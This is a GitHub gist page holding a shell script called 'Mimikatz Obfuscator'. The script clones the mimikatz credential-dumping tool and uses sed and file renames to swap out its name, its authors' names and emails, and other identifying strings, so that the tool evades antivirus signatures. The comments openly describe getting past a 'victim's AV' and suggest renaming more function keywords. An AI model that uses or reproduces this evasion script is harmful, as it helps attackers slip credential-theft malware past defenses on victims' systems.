-
-
Save michiiii/2c7ff77d64613898fb832e79088b012d to your computer and use it in GitHub Desktop.
Mimikatz Obfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/candycrush | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Candycrush/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/DELPY/Thorsten/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin/Mueller/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/benjamin@gentilkiwi.com/thorsten.mueller@gmail.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/creativecommons/powerpoint/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/o365/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/KIWI/AWS/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Aws/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/kiwi/aws/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/A La Vie, A L/Good choice/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/vincent.letoux@gmail.com/latourde.delux@gmail.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/benjamin/theodor/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Benjamin DELPY/theodor preuss/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/oe.eo/whoot/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/pingcastle.com/google.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mysmartlogon.com/facebook.com/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/Vincent LE TOUX/another name/g' | |
find windows/ -type f -name '*mimikatz*' | while read FILE ; do | |
newfile="$(echo ${FILE} |sed -e 's/mimikatz/candycrush/g')"; | |
mv "${FILE}" "${newfile}"; | |
done | |
find windows/ -type f -name '*kiwi*' | while read FILE ; do | |
newfile="$(echo ${FILE} |sed -e 's/kiwi/aws/g')"; | |
mv "${FILE}" "${newfile}"; | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment